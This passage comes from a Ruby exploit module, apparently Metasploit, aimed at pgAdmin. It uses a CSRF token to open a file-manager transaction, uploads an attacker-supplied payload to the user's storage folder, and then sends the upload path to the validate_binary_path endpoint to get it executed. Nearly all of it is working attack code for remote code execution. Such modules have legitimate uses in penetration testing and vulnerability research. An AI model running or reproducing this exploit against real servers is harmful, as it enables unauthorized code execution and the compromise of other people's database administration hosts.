'ctype' => 'application/json',<br /> 'headers' => { 'X-pgA-CSRFToken' => csrf_token },<br /> 'data' => {<br /> 'dialog_type' => 'storage_dialog',<br /> 'supported_types' => ['sql', 'csv', 'json', '*'],<br /> 'dialog_title' => 'Storage Manager'<br /> }.to_json<br /> })<br /><br /> unless res&.code == 200 && (trans_id = res.get_json_document.dig('data', 'transId')) && (home_folder = res.get_json_document.dig('data', 'options', 'homedir'))<br /> fail_with(Failure::UnexpectedReply, 'Failed to initialize a file manager transaction Id or home folder')<br /> end<br /><br /> return trans_id, home_folder<br /> end<br /><br /> def file_manager_upload_and_trigger(file_path, file_contents)<br /> trans_id, home_folder = file_manager_init<br /><br /> form = Rex::MIME::Message.new<br /> form.add_part(<br /> file_contents,<br /> 'application/octet-stream',<br /> 'binary',<br /> "form-data; name=\"newfile\"; filename=\"#{file_path}\""<br /> )<br /> form.add_part('add', nil, nil, 'form-data; name="mode"')<br /> form.add_part(home_folder, nil, nil, 'form-data; name="currentpath"')<br /> form.add_part('my_storage', nil, nil, 'form-data; name="storage_folder"')<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, "/file_manager/filemanager/#{trans_id}/"),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'ctype' => "multipart/form-data; boundary=#{form.bound}",<br /> 'headers' => { 'X-pgA-CSRFToken' => csrf_token },<br /> 'data' => form.to_s<br /> })<br /> unless res&.code == 200 && res.get_json_document['success'] == 1<br /> fail_with(Failure::UnexpectedReply, 'Failed to upload file contents')<br /> end<br /><br /> upload_path = res.get_json_document.dig('data', 'result', 'Name')<br /> register_file_for_cleanup(upload_path)<br /> print_status("Payload uploaded to: #{upload_path}")<br /><br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/misc/validate_binary_path'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'ctype' => 'application/json',<br /> 'headers' => { 'X-pgA-CSRFToken' => csrf_token },<br /> 'data' => {<br /> 'utility_path' => upload_path[0..upload_path.size - 16]<br /> }.to_json<br /> })<br /><br /> true<br /> end<br /><br />end<br /></code></pre>